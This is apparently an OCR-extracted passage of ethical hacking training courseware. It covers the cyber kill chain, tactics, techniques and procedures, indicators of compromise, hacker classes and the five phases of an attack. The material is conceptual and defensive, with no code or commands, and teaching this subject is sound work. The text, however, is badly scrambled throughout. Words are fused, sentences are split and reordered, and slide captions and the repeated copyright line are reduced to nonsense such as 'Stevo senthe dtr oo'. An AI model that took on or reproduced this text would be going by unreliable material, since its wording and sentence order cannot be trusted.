and techniquesthat can exploit andgain unauthorizedaccess to the
targetorganization. analysis,
Basedon thevulnerabilitiesidentifiedduring the adversary
selectsor creates a payload
tailoreddeliverablemalicious (remote-access
malware
Module ical andCountermensores
Mackin ©by E-Comel
Copyright
weapon) usingan exploit to sendit to the victim. An adversary
and a backdoor may
network devices,operatingsystems,endpoint
target specific devices,or even
individuals
withintheorganizationto carryout theirattack.Forexample,
theadversary
may email
to
an oftheorganization,
senda phishing
a malicious
employee target whichmay include
attachmentsuchas a virus or worm that, whendownloaded,
that allowsremote access to the adversary.
backdooro n the system
installsa
Thefollowing
are the activities of the adversary:
© Identifying payload
malware
appropriate basedo n theanalysis,
a new malwarepayload
©. Creating reusing,modifying
or selecting, theavailable
malwarepayloads
basedon the identifiedvulnerability,
>
©
Creating
phishing
a
email
exploit
campaign
Leveraging kitsandbotnets
Delivery
The previous stageincludedcreating2 weapon. Its payload is transmittedto the
intended victim(s)
as an emailattachment,via a maliciouslink on websites,or througha
vulnerableweb application or USBdrive. Delivery is a keystagethat measures the
effectiveness
of the defensestrategies implemented bythe targetorganization based
whetherthe intrusion attemptof the adversary
‘on is blockedor not.
Thefollowing
are the activities of the adversary:
©.
©.
Sending
phishing
Distributing
emailsto employees
of
the
target
organization
maliciouspayload
USBdrivescontaining to employees
ofthetarget
organization
Performing holeon the compromised
attackssuchas watering website
Implementing
various hacking
servers of the targetorganization the
toolsagainst operating applications,
systems, and
Exploitation
‘After
the weapon is transmittedto the intended victim, exploitation
triggersthe
maliciouscode to exploita vulnerability
adversary’s in the operatingsystem,
application, system.At this stage,
or server on a target the organization
may face
threatssuchas authenticationandauthorizationattacks,
arbitrary
code execution,
physical threats,
security misconfiguration,
andsecurity
Activities of the adversary
includethe following:
© softwareor hardware
Exploiting vulnerabilities
to gain remote accessto the target,
system
ical andCountermensores
Mackin ©by E-Comel
Copyright
Installation
Theadversary downloadsandinstallsmore malicioussoftwareon the targetsystem to
maintain access to the target networkfor a n extendedperiod, Theymay use the
‘weaponto installa backdoorto gainremote access.Afterthe injection of the malicious
code o n one target system, the adversary
gainsthe capabilityto spread the infectionto
other end systems i n the network.Also,the adversarytries to hide the presenceof
maliciousactivities fromsecuritycontrolslikefirewallsusingvarious techniques suchas
encryption.
Thefollowing
are the activities of the adversary:
©
Downloading
andinstallingmalicioussoftwaresuchas backdoors
>
©
Gaining
remote access
Leveraging
various
to
the
methods
targetsystem
backdoor
to keep hiddenandrunning.
Maintaining
accessto the targetsystem
Command
andControl
The adversary creates a commandand control channel,whichestablishes
two-way
communication betweenthe victim'ssystemand adversary-controlled server to
andpassdatabackandforth. Theadversaries
‘communicate implementtechniquessuch
as encryption
performsremote exploitation of
to hidethe presence suchchannels.
on the target
Usingthischannel,
or network.
system
the adversary
Thefollowing
are the activities ofthe adversary:
© Establishing
a two-waycommunication channelbetween
thevictim'ssystem
andthe
adversary-controlled
server
© Leveraging
channelssuchas web traffic,
emailcommunication,
andDNSmessages.
©. Applying
privilege
escalationtechniques
© anyevidenceofcompromise
Hiding usingtechniques
suchas encryption
Actionson Objectives
The adversary controlsthe victim's systemfrom a remote location and finally
accomplishes their intendedgoals.Theadversary gainsaccess to confidentialdata,
disruptsthe services or network,
or destroys
the operational
capabilityof the targetby
gainingaccess to its networkandcompromising more systems.Also,the adversary may
use
this point
to attacks.
as a launching performother
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tactics,
Techniques, and Procedures(TTPs)
Tactics » 4
‘Techniques
suggests tn on
Some
Stevo
senthe
dtr oo &
Tactics, andProcedures(TTPs)
Techniques,
Theterms “tactics,techniques, andprocedures―referto the patterns of activities andmethods
associated with specific threatactorsor groupsof threatactors.TTPsare helpful i n analyzing
threats and profiling threat actors and can further be used to strengthen the security
infrastructure ofan organization. is definedas a guideline
Theword “tactics― that describes the
wayan attackerperforms theirattackfrombeginning to end.Theword “techniques― is defined
as the technicalmethodsused byan attackerto achieveintermediateresultsduring their
attack.Finally,theword “procedures― is definedas the organizational approach followedbythe
threat actors to launchtheir attack.In order to understandand defend against the threat
actors,itis important to understandtheTTPs usedbyadversaries. Understanding the tacticsof
an attackerhelps to predict anddetectevolving threatsi n the early stages. Understanding the
techniques used byattackershelpsto identify vulnerabilitiesand implement defensive
measures i n advance.Lastly, analyzing the procedures usedbythe attackershelps to identify
‘what
the attacker
Organizations
for
is looking within the targetorganization's infrastructure.
shouldunderstandTTPsto protecttheir network againstthreat actors and
upcomingattacks.TTPs enablethe organizations thereby
to stopattacksat the initial stage,
thenetworkagainst
protecting massivedamages,
=
Tactics
during
Tacticsdescribethe way the threat actor operates differentphases of an attack.
It consistsof the various tactics usedto gather
information
forthe initialexploitation,
performprivilege
escalationand lateral movement,and deploymeasures for
accessto the system.
persistence Generally,
APTgroupsdepend on a certain set of
unchanging but i n some cases,theyadapt
tactics, to differentcircumstances andalter
ical andCountermensores
Mackin ©by E-Comel
Copyright
thewaytheyperform the difficulty
theirattacks.Therefore, ofdetecting
andattributing
the attackcampaigndepends
on the tacticsusedto perform
theattack.
‘An
organization
can profile
threat actors basedo n tacticstheyuse; this consists of the
way theygatherinformationabout a target,the methodstheyfollow for initial
compromise, andthe numberof entrypointstheyuse while attempting to enter the
targetnetwork.
Forexample,
to obtain information,
some threat actors depend
solely
o n information
availableon the Internet,whereasothersmight perform socialengineeringor use
connections in intermediate organizations. Once information such as the email
addresses of employeesof the target is gathered,
organization the threat actors either
chooseto approach the targeto ne byone or as a group. Furthermore, the attackers’
designed
bechanged
better,
payloadcan stayconstant fromthe beginning
basedon thetargeted
tacticsusedi n the early
individual.Therefore,
stages
of
to the end the attackor may
to understand
of an attackmust beanalyzed
properly.
the threatactors
methodof analyzing
‘Another the APTgroupsis inspecting
theinfrastructure
andtools
usedto perform
theirattack.Forexample,
considerestablishing
acommand
andcontrol
channel
on the servers controlled
bythe attacker.TheseC&Cservers may be located
within a specific geographicallocationor mayspread across the Internetand can be
static or can change dynamically, It is also important to analyze the tools used to
perform the attack.Thisincludesanalyzing the exploits andtoolsusedbyvarious APT
groups.In sucha scenario, a sophisticated threat actor may exploit many zero-day
vulnerabilitiesbyusingadapted toolsandobfuscation methods,However, this might
be
difficult as less-sophisticatedthreat actors generally depend o n publicly known
vulnerabilitiesandopen-source tools.Identifying thistypeof tactic helps i n profiling
the
APTgroups andbuilding defensivemeasures i n advance.
In some cases,understanding
the tactics usedi n the laststages
of an attackhelps
in
the threat actor. Also,the methodsusedto cover the trackshelpthe target
profiling
organization understandattackcampaigns. Analyzing the tactics usedbythe attackers
helpsin creatingan initial profile
byunderstanding differentphases of an APTlife cycle.
Thisprofilehelps i n performing of the techniques
further analysis andprocedures used
bythe attackers.An attackermaycontinually change theTTPsused,so itis importantto
constantlyreview andupdate the tacticsusedbythe APTgroups.
Techniques
To launchan attack successfully, threat actors use severaltechniques duringits
execution. Thesetechniques includeinitial exploitation,settingup and maintaining
command andcontrolchannels, accessing the targetinfrastructure,
andcoveringthe
tracksof dataexfiltration.The techniques followedbythe threat actor to conductan
attackmight vary, but they are mostly similarand can beusedfor profiling. Therefore,
understanding the techniques usedin the different phases of an attackis essentialto
analyzingthethreat groupseffectively.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Techniques can alsobe analyzed at eachstageof thethreatlife cycle, Therefore,the
techniquesat the initial stagemainly describethe toolsusedfor informationgathering
andinitialexploitation, Thetechniques usedi n thisstageneednot necessarily havea
technicalaspect.Forexample, i n socialengineering, certain non-technical
softwaretools
are wayofgathering
usedas an effective information.
Anattackercan use suchtoolsto
obtainthe emailaddresses employees
of targetorganization through publicly
available
resources.
In the samemanner, purely human-based socialengineeringcan beusedto perform the
initial exploitation.
For example, considera scenario wherethe victim is trickedvia a
phone call to reveal their logincredentials for accessingthe targetorganization's
internalnetwork.Thesetechniques are usedi n the initial phase
of an attackto gather
information aboutthetargetandbreakthe firstlineofdefense.
Techniques
usedin the middlestages
of an attackmostly on technical
depend toolsfor
initially
escalatingprivileges
on systems that are compromised or performing lateral
movernents within the targetorganization’s
network.At this stageof an attack,the
attackersuse various exploitsor misuse configurationvulnerabilitieson the target
system. Theymayalsoexploit networkdesign flawsto gainaccessto other systems in
the network.In all of thesecases,either exploits
or a collectionof tools allowsthe
to perform
attacker attack.In thisscenario,the term “technique―
a successful is the set
of tools and the way theyare used to obtain intermediateresultsduring a n attack
campaign.
Thetechniques in the laststageof an attackcan haveboth technical and nontechnical
aspects. In sucha scenario,the techniques usedfor data-stealing are usually basedon
networktechnology and encryption. Forexample, the threatactor encrypts the stolen
files,transfersthemthrough the establishedcommand andcontrolchannel, andcopies
themto their own system. Aftersuccessfullyexecuting theattackand transferring the
files,the attackerfollowscertain purely technicaltechniquesto cover their tracks.They
useautomatedsoftware
After aggregatingthe techniques
files
toolsto clearlogs to evadedetection.
of an attack,the organization
usedin all the stages can
use the informationto profile
thethreat actors.In orderto makean accurateattribution
of threat actors, the organization must observeall the techniques used by its
adversaries.
Procedures
involvea sequenceof actions performed
“Procedures― bythethreatactors to execute
different stepsof an attacklife cycle.Thenumberof actions usually differsdepending
upontheobjectives oftheprocedure andtheAPTgroup.An advanced threat actor uses
advancedprocedures that consistof more actions than a normalprocedure to achieve
the same intermediate result.Thisis done mainly to increase the successrate of an
attackanddecrease the probabilityof detectionbysecurity mechanisms.
For example,
in a basic procedure
of information gathering,
an actor collects
information
aboutthe targetorganization;
identifies
keytargets,employees;
collects
ical andCountermensores
Mackin ©by E-Comel
Copyright
theircontact details,
identifiesvulnerablesystems and potentialentrypointsto the
targetnetwork,anddocumentsall the collectedinformation.Thefurther actions of an
adversarydepend on the tactics used.Theseactions includeextensive researchand
repeated
informationgathering
to collectin-depth
and up-to-date
informationon the
via socialnetworking
targetindividuals sites.Thisinformation can assistthreatactors in
performing spear phishing,monitoring
security controlsto identify zero-dayexploitsin
the targetsystems, andothertasks.Forexample, a threatactor usinga more detailed
procedure executesthe malwarepayload. At the time of execution, the maliciouscode
decrypts evades
itself, security
monitoringcontrols, deployspersistence, andestablishes
a command andcontrolchannelfor communicating with the victim system.Thistypeof
procedure
is common for malware,
wheredifferentthreat actors may implement
the
same feature,
andhenceitis usefuli n forensicinvestigations.
‘Anunderstandingand proper analysis of the proceduresfollowed bycertain threat
actors duringan attack helps organizations profile
threatactors.In theinitialstageof an
attack, suchas duringinformationgathering, observing
the procedure of an APTgroupis
difficult. However,the later stagesof an attackcan leavetrailsthat may be usedto
understandthe procedures the attackerfollowed.
ical andCountermensores
Mackin ©by E-Comel
Copyright
BehavioralIdentification
Adversary
(@Adversary
behavioral
dentifationinvolves
(©.
eevesthesecurtyprofessionals
sgh
into
upcoming
threats andexploits
ec
Powerslrrr
BH vest
BD ster erage
reed
ron||FR) and
cnt
server
Actoties
ont
staging
command
BehavioralIdentification
Adversary
‘Adversary
behavioralidentificationinvolvesthe identificationof the common methodsor
techniquesfollowedbyan adversary to launch attacks
to penetrate an organization’s
network.
professionals
It givessecurity insight
into upcomingthreatsand exploits. It helpsthem plan
networksecurityinfrastructure andadapt a rangeof securityprocedures as preventionagainst
various cyberattacks.
Givenbelow are some of the behaviorsof an adversary that can be used to enhancethe
detection
capabilities
=
security
devices: of
InternalReconnaissance
Oncethe adversary is insidethe targetnetwork, theyfollow various techniques and
methodsto carry out internalreconnaissance. Thisincludesthe enumeration of
systems, hosts, processes, the execution of various commands to find out information
suchas the localuser context and system configuration, hostname, IP addresses,
active
remote systems, and programsrunningon the targetsystems. Securityprofessionals
monitor the activities of an adversary
‘can bychecking for unusualcommands executed
in the BatchscriptsandPowerShell andbyusingpacket capturingtools
Useof PowerShell
PowerShell can be usedbyan adversary as a tool for automatingdataexfiltrationand
launching To identify
furtherattacks. the misuseof PowerShell in the network, security
professionals can checkPowerShell’s
transcriptlogsor WindowsEventlogs.The user
agentstringandIP addresses can alsobeusedto identify malicioushostswhotry to
exfiltratedata,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Unspecified
ProxyActivities
adversary
‘An can create and configure multiple domainspointingto the same host,
thus,allowingan adversary to switchquickly betweenthe domainsto avoiddetection,
Securityprofessionals
can find unspecifieddomainsbychecking thedatafeedsthat are
generated bythosedomains.Using this data feed,the securityprofessionals
can also
filesdownloadedandthe unsolicitedcommunicationwith theoutside
find anymalicious
networkbasedon the domains.
UseofCommand-Line
Interface
(Ongainingaccessto the targetsystem, can makeuse of the command-line
an adversary
interfaceto interact with the targetsystem, browsethe files,readfile content,modify
file content,create new accounts,connect to the remote system, anddownloadand
installmaliciouscode.Security professionals
can identify
this behaviorof an adversary
bychecking thelogsforprocessID,processes having
arbitrary lettersandnumbers,and
files
malicious downloaded
HTTPUserAgent
fromthe Internet,
ical andCountermensores
Mackin ©by E-Comel
Copyright
the network byanalyzing
server access,error logs, stringsthat indicate
suspicious
encoding, andthrough
strings,
user agent othermethods.
Data Staging
Aftersuccessful
penetration
into a target's
network, the adversary
uses datastaging
techniques
tocollectasdata
andcombine much
by an adversary
as possible.
includesensitive dataaboutthe employees
businesstactics of an organization,
of
Thetypes datacollected
and customers,the
financialinformation,
and networkinfrastructure
information. Oncecollected, the adversarycan either exfitrateor destroythe data
Securityprofessionals can detect data stagingby monitoring network traffic for
maliciousfile transfers,
file integrity
monitoring,andevent logs.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Indicatorsof Compromise
(IoCs)
{©
ndeatrs
Cs)
are
he
cues,of dat
ofCompromise artfats,
and pecs foresi ound on he network
(©locsarenotintetigence,
they
although
do
act as good source ofinformation thethreats
regarding that
(©:
secuntyprofesionalnes to performcontinuous of oC
monitoring to ffcively andefcent detect,
ondrespond
to evelingever treats
(IoCs)
Indicatorsof Compromise
Cyberthreats are continuously
evolving
with the newer TTPsadapted
based on the
vulnerabilities
of the targetorganization. professionals
Security must perform continuous
of loCsto effectively
monitoring and efficiently
detectand respond to evolving
cyber threats.
Indicators
of Compromise are the clues, andpiecesof forensic
artifacts, datathat are found on
a network or operating systemof an organization that indicate 2 potentialintrusion or
‘malicious i n the organization's
activity infrastructure.
However,loCsare not intelligence;rather,loCsact as a goodsource of information about
threatsthat serve as data pointsi n the intelligence process. Actionablethreat intelligence
extractedfromloCshelps organizations enhance incident-handling Cybersecurity
strategies.
professionals use various automatedtools to monitor loCsto detect and preventvarious
securitybreaches to the organization.Monitoring !0Cs alsohelpssecurity teams enhance the
securitycontrolsandpolicies of the organizationto detectandblocksuspicious trafficto thwart
furtherattacks.To overcome the threatsassociated with loCs,
some organizations like STIX and
TAXI havedeveloped standardized reportsthat contain condensed datarelatedto attacksand
sharedit with othersto leverage the incidentresponse.
IoCis an atomic indicator,
‘An computed indicator,or behavioralindicator.It is theinformation
regarding suspiciousor malicious activities that is collected from various security
establishments in a network's infrastructure.
Atomic indicators are thosethat cannot be
segmented
Examples
into
smaller parts,andwhosemeaningis not changed
of atomic indicatorsare IP addresses
obtainedfromthedataextractedfroma security
andemailaddresses.
incident.Examples
in thecontext
Computed
ofcomputed
ofan
intrusion,
indicatorsare
indicatorsa re
hashvaluesand regular expressions. Behavioralindicatorsrefer to a groupingof both atomic
andcomputed indicators,
combinedon the basisof some logic.
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
of Indicatorsof Compromise
Categories CEH
|@ Understanding securityprofesional
los helps detectthetveatsagains
to quichy andprotect
the organization
of Indicatorsof Compromise
Categories
The cybersecurity professionals
must have proper knowledge about various possiblethreat
to cyber
actors andtheirtacticsrelated threats,mostly
calledIndicatorsof Compromise (IoCs)
Thisunderstanding of loCshelps
securityprofessionals
quicklydetectthe threatsentering the
organization fromevolving
andprotect the organization threats.For this purpose,loCs are
dividedinto four categories:
=
EmailIndicators
Attackersusuallypreferemailservices to sendmaliciousdatato the targetorganization
or individual.Suchsocially
comparative
address,
anonymity.
emailsubject,
andattachments
emails
engineered are preferred
Examples
dueto their ease useand
of email indicatorsinclude the sender'semail
or links.
of
NetworkIndicators
Network indicatorsare useful for commandand control, malwaredelivery,
and
identifying
detailsabout the operatingsystem,browsertype,andothercomputer-
specific
information.Examplesof networkindicatorsincludeURLs,
domainnames, and
IP addresses.
Host-Based
Indicators
indicatorsa re found byperforming
Host-based an analysis
of the infectedsystem
within
the organizational
network.Examples of host-based
indicatorsincludefilenames,
file
hashes, keys,
registry DLLs, andmutex.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Behavioral
Indicators
Generally, typicalloCs are useful for identifyingindicationsof intrusion, such as
maliciousIP addresses, MDS hash,
virus signatures, anddomainnames. BehavioralloCs
are used to identify specific behaviorrelated to maliciousactivities suchas code
injectioninto the memoryor running the scriptsof an application. Well-defined
behaviorsenablebroadprotection to blockall current andfuture maliciousactivities.
Theseindicatorsare usefulto identify when legitimate systemservices are usedfor
abnormalor unexpected activities. Examplesofbehavioral indicatorsincludedocument
PowerShell
executing script,andremote command execution.
Liste1dbeloware some of the keyIndicators of Compromise
(loCs):
Unusual
outbound networktraffic
Unusualactivitythrough
a privileged
user account
Geographical
anomalies
Multiple
Increased
login failures
databasereadvolume
Large
HTMLresponse size
of
Bundlesdata the wrong places
i n
Webtrafficwith superhuman
behavior
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
CEH
‘Information
Security
peer ©scring
concepts chain
Information
Security
mKQ
Hacking
Concepts
of hacking:
Thissection dealswith basicconcepts whatis hacking,
whois a hacker, andhacker
classes—thefive distincthacking
phasesthat one shouldbe familiarwith before proceeding
with ethicalhacking methodology.
08
Module 27
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
What is Hacking?
(@Hacking
refers
exploiting
system
vulnerabilities
to
and
compromising
security
sytem
to ain unauthorized controls
resources,
or nappropiteaccess toa
purpose a
(©
teinvoles modifying ot application to achieve
features goaloutsideofthe
original
system
eata's
(@Hackingcanbe
used to steal andrestibute tobusiness
intelectualpropertyleading
los
Whatis Hacking?
Hacking in the field of computer securityrefers to exploiting systemvulnerabilitiesand
compromisingsecuritycontrolsto gain unauthorized or inappropriate access to system
resources. It involvesa modifying systemor application featuresto achievea goaloutsideits
creator's original purpose.Hacking can be doneto steal, pilfer,or redistribute intellectual
property, thusleading to businessloss.
Hacking o n computer networksis generally done using scriptsor othernetworkprogramming,
Networkhacking techniques includecreating viruses and worms, performing denial-of-service
(DoS)attacks, establishing
unauthorizedremote access connectionsto a deviceusing trojansor
backdoors, creatingbotnets, packet sniffing, phishing,and password cracking. Themotive
behindhacking couldbe to stealcriticalinformationor services,for thrill,intellectualchallenge,
curiosity, knowledge,
experiment, financialgain, prestige,
power, peerrecognition,
vengeance
andvindictiveness,
amongotherreasons
ical andCountermensores
Mackin ©by E-Comel
Copyright
Who is a Hacker?
ol 02 03
‘excellent
skills tosor
computer
Can
create ee who ‘hobbyhow mary
gain
‘either
(orto
probe
do
beto
legal
knowledge
computer
software
‘ean
andexpore computers networks
they and
snd compromise ‘hinge
mo rs
Somehackwth
malicious
intent dat,
card security
such
numbers,
a t tealbusines cet information,
social
Who
is a Hacker?
A hackeris a personwho breaksinto a systemor networkwithoutauthorizationto destroy,
steal sensitive data,or perform maliciousattacks.A hackeris an intelligent
individualwith
excellentcomputer skills,along with the ability the computer's
to create andexplore software
andhardware.Usually, a hackeris a skilledengineeror programmer with enoughknowledge to
discovervulnerabilitiesin a targetsystem. They generallyhave subject and enjoy
expertise
learningthe detailsof various programming
For some hackers, hacking is a hobby
languages and
to see how manycomputers
computer
systems.
or networkstheycan
compromise. Theirintention can either be to gain knowledge
or to poke aroundto do illegal
things.Some hackwith maliciousintent behindtheir escapades, businessdata,
like stealing
creditcardinformation,
socialsecurity numbers, andemailpasswords,
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
HackerClasses CEH
@
ac Hate @Q
WaiteHats
@
CrayHat
@
Suicide
Hackers
oo @Q@@o
HackerClasses
Hackersusually
fall into one of the following according
categories, to their activities:
Black Hats:Blackhatsare individualswho use their extraordinary skillsfor
computing
illegal
or malicious
purposes.Thiscategory
of hackeri s ofteninvolvedi n criminal
are
activities. They alsoknownas crackers.
White Hats: Whitehatsor penetration testers are individualswho use their hacking
skillsfor defensivepurposes.Thesedays,almosteveryorganization hassecurity analysts
who are knowledgeable about hacking
countermeasures, whichcan secure its network
and information systems againstmaliciousattacks.Theyhave permissionfromthe
systemowner
GrayHats: Grayhatsare the individualswhoworkboth offensively and defensivelyat
various times. Gray hatsmight
to vulnerabilities
helphackersfind various
or
network and,at the same time, helpvendorsto improve products
hardware) bycheckinglimitationsandmaking then more secure,
in a system
(software
or
ical andCountermensores
Mackin ©by E-Comel
Copyright
Cyber terrorists are individuals
Terrorists:Cyber with a wide rangeof sills,motivated
byreligious
or political
beliefs,
to create fear of large-scale
disruption
of computer
networks.
State-Sponsored
Hackers:State-sponsored
hackersare individualsemployed
bythe
gain top-secretinformation from, and damage
governmentto penetrate, the
informationsystems
of othergovernments.
Hacktivist:Hacktivismis whenhackersbreak into government or corporate computer
systems a s an act of protest.Hacktivists use hacking to increase awareness of their
socialor politicalagendas, as well as to boosttheir own reputations i n both the online
andoffline arenas. They
especiallybydefacing
are individuals
or disabling
who use hacking
websites a
to promotepolitical agenda,
Commonhacktivisttargetsincludegovernment agencies, multinationalcorporations,
andany otherentitythat theyperceiveas a threat.Irrespective of the hacktivists’
the gaining of unauthorized
intentions, access is a crime,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Phase:Reconnaissance
Hacking
knownona
‘The broad
sale,
ange
may
include
the employees,
econnaeance target
operations,
and target orguiatin’schns, newark systems
Types
PassiveReconnaissance
Reconnaissance
‘Retive
Receemaiseance
avec
oration without
heiwohes
with
target
Pasiverecoonlseanceinvolves
acauing
interacting
©Activereconnaissance
interacting
ety
byanymeans
publ
© Forexample,
searching
hala
or recordsor des etn department
HackingPhases
In general,
thereare five phases
of hacking:
Reconnaissance
Scanning
=
Access
Gaining
Maintaining Access
=
Clearing
Hacking
Tracks
Phase:Reconnaissance
Reconnaissance refers to the preparatory phasein which an attacker gathers as much
informationas possible about the targetprior to launching the attack. In this phase, the
attackerdrawson competitive intelligenceto learnmore aboutthe target.It could bethe
future pointof return,notedfor ease of entryfor an attackwhen more aboutthe targetis
knownon a broadscale.Thereconnaissance
clients,
employees, operations,network, andsystems. target
range
mayinclude the targetorganization's
phase
‘This allowsattackersto plan the attack.It may take some time as the attacker gathers as.
muchinformation a s possible.
Partof this reconnaissance may involvesocialengineering.A
socialengineeris a personwho convinces people to revealinformationsuchas unlistedphone
numbers, passwords, and othersensitive information. For instance,the hackercouldcallthe
target'sInternet service provider and,usingpersonal informationpreviously obtained,convince
the customer service representative that the hacker is actuallythe target,and in doingso,
obtaineven more informationaboutthe target.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Another reconnaissance technique is dumpster diving.Dumpster divingis, simplyenough,
lookingthrough trashfor any discardedsensitive information.Attackerscan
an organization’s
Use the Internet to obtain information suchas employees’contact information, business
partners,technologiescurrentlyi n use, andothercriticalbusinessknowledge. Dumpster diving
may even provide attackerswith even more sensitive information, suchas usernames,
passwords, creditcardstatements, bank statements, ATM receipts, SocialSecuritynumbers,
privatetelephone checking
numbers, account numbers, or othersensitive data,
Searching targetcompany’s
for the web site in the Whois
Internet’s database can easily
provide
hackerswiththe company's
IP addresses,
domainnames,andcontact information.
Reconnaissance
Types
techniques
Reconnaissance are broadly
categorized
into active andpassive.
Whenan attackeris usingpassivereconnaissancetechniques, theydo not interact with the
targetdirectly.
Instead,the attackerrelieson publicly
availableinformation,
news releases, or
otherno-contact methods.
Activereconnaissancetechniques, on theother hand,
involvedirectinteractions with the target
system byusing tools to detect open ports, accessible hosts,router locations, network
mapping,detailsof operating systems, and applications.
Attackersuse active reconnaissance
telephone of
whenthere is a low probabilitythe detectionof theseactivities, For example,
callsto the helpdeskor technicaldepartment,
theymay make
Asanethicalhacker, to beableto distinguish
itis important among the various reconnaissance
methodsandadvocate m easures i n the lightof potential
preventive threats.Companies, on
as an integral
their part,must addresssecurity partof their businessandoperational strategies,
andbeequipped withthe properpolicies
andprocedures to checkfor potential vulnerabilities.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Phase:Scanning
Hacking
Pro-attack
Phase
referst o thepre-attack
Scanning
‘networ
forspecific
phase the
information
based when
on informationattacker
scans
theres
the
ring
can ince
‘Scanning theuse ofelrs, portscanners, network mapper
in tools,and vera sanners
Extract
Information || extract
information
Attackers
typ, to atack
OSdeta, devce and
uch
system
as lve machines,
uptimelaunch
port, ort status
HackingPhase:Scanning
Scanning is the phase immediately preceding the attack.Here,the attackeruses the details
gathered
during
reconnaissance to scan the networkfor specific information.Scanning is a
Scanning can include the use of dialers, port scanners, network mappers,ping tools,
vulnerability scanners,or othertools.Attackersextract informationsuchas live machines, port,
portstatus,OSdetails, devicetype,andsystem uptimeto launchan attack.
Portscanners detectlistening portsto find informationaboutthe nature of services running on
the targetmachine. The primarydefense technique againstport scanners is shutting down
services
that are not required andimplementing
can still use toolsto determine the rulesimplemented
portfiltering.
appropriate
bythe portfiltering.
However,attackers
ical andCountermensores
Mackin ©by E-Comel
Copyright
Phase:Gaining
Hacking Access
>= 9= —_
a trample ince cracking,
pasword utr
appliatio,or network
system, levels
hacking
eC SS
HackingPhase:Gaining
Access
Thisis the phase in whichrealhackingoccurs. Attackersuse vulnerabilitiesidentifiedduringthe
reconnaissance and scanningphases to gain access to the target
system and network.Gaining
access refersto the pointwherethe attackerobtainsaccess to the operating systemor to
applications on the computer or network.Theattackerc an gainaccess to the operating system,
application, or networklevel. Eventhough attackerscan cause plentyof damage without
gainingany access to the system, the impactof unauthorizedaccess is catastrophic. For
instance,externaldenial-of-serviceattackscan eitherexhaustresources or stopservices from
runningon the target system.Ending processescan stopa service, usinga logic bombor time
bomb, or even reconfigure andcrashthe system. Furthermore,attackerscan exhaustsystem
andnetworkresources byconsumingall outgoing communication links.
Attackersgainaccess to the targetsystem locally(offline),
over a LAN, or the Internet. Examples
Include password cracking, stack-basedbuffer overflows,denial-of-service, and session
hijacking. Using a technique calledspoofing to exploit the systembypretending to be a
legitimate user or different system, attackerscan senda data packet containing a bugto the
target systemi n order to exploit Packetflooding
a vulnerability. alsobreaksthe availability of
essentialservices. Smurfattacks attemptto cause userson a networkto floodeachotherwith
data,making i t appear as if everyone is attacking each other,and leaving the hacker
anonymous.
A hacker'schances of gainingaccessto a targetsystem depend on severalfactorssuchas the
architectureand configuration of the target
system, the skilllevelof the perpetrator, andthe
initial levelofaccessobtained.Oncean attacker gainsaccessto the targetsystem, theythentry
to escalateprivileges in order to take complete control.In the process,theyalsocompromise
the intermediate systems that are connectedto it.
08
Module 35
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
1
Phase:Maintaining
Hacking Access CEH
to the
access refers thephase
Maintaining
‘ofthe
system
w hen attackertries to retaintheir ownership
can data,
~astocers upload, or manipulate applications,
download, configueationso
and
use
the
attackers compromised to launch
system furtherattacks
Phase:Maintaining
Hacking Access
Maintaining
access refersto the phase
whenthe attackertries to retain hisor her ownership
of.
the system.Oncean attackergainsaccess to the targetsystemwith adminor root-level
(thus
privileges owningthe system), theycan use boththe systemandits resources at will. The
attacker a
can eitheruse the system
a low profile
damage.
as launchpad
andcontinue their exploitation.
For instance,
to scan andexploit othersystemsor to keep
Bothof theseactions can causea greatamount of,
the hackercould implement all network traffic,
a sniffer to capture
includingTelnetandFTP(filetransferprotocol) sessionswith other systems,andthen transmit
wherever
they
that data
Attackers
please.
who chooseto remain undetectedremove evidence of their entryandinstalla
backdooror a trojanto gain repeataccess. Theyc an alsoinstallrootkitsat the kernellevel to
gain full administrativeaccessto the targetcomputer. Rootkitsgain accessat the operating
system level,
whiletrojansgainaccessat the applicationlevel.Bothrootkitsandtrojansrequire
Usersto installthem locally.In Windowssystems, installthemselves
most trojans as a service
andrun as partof the localsystem with administrative
access.
Attackerscan upload, download, or manipulate data,applications, and configurationson the
ownedsystemand can also use trojansto transferusernames, passwords, and any other
informationstoredon the system. They can maintain controlover the systemfor a longtime by
closingup vulnerabilities
to prevent other hackersfromtaking controlof them,andsometimes,
rendersome degree
in the process, of protectionto the system fromother attacks.Attackers
Use the compromised system to launchfurtherattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Phase:Clearing
Hacking Tracks
413
H
e e e
Clearing
by attacker’
intentions
tracks referstothe ‘he
continuing
include “Te
attacker overwrites the
to sytem
es carcedo ut 30 obtaining acess and
server, system, appitlon
and
stackerhie maliciousacts ‘he
vim remaining logs0 avoidsrpicion
‘anaticed uncaugh,
lead mig
evidence
and
deleting that
to thei prosecution
é ii
Phase:Clearing
Hacking Tracks
For obviousreasons, suchas avoiding legaltrouble and maintaining access, attackerswill
usually attempt to erase all evidence of theiractions.Clearing tracksrefersto the activities
carriedout byan attackerto hidemaliciousacts. Theattacker'sintentions includecontinuing
accessto thevictim’s system, remainingunnoticed and uncaught, anddeleting evidence that
might lead to their own prosecution.They use utilities such as PsTools
(https://docs.microsoft.com), Netcat,or trojans to erase their footprints fromthe system's log
files.Oncethe trojansare in place, the attackerhasmost likelygained total controlof the
system and can execute scripts i n the trojanor rootkit to replace thecriticalsystem andlogfiles
to hidetheir presence i n the system. Attackersalways cover theirtracksto hidetheir identity.
Othertechniques includesteganography and tunneling. Steganography is the processof hiding
data i n other data,for instance,i n imageand soundfiles.Tunneling takesadvantage of the
transmission protocol bycarryingone protocol over another.Attackerscan use even a small
amount of extra spacei n the data packet's TCPandIP headersto hideinformation.An attacker
against
other
or
as
a
can use the compromised
reaching anothersystem
into anotherattack’s
system to launchnew attacks
on the networkundetected.
reconnaissancephase. System
Thus,
systems
this phase
administrators
meansof
of the attackcan turn
can deploy host-based IDS
(intrusion detection systems) and antivirus softwarei n order to detect trojansand other
seemingly
compromised
files
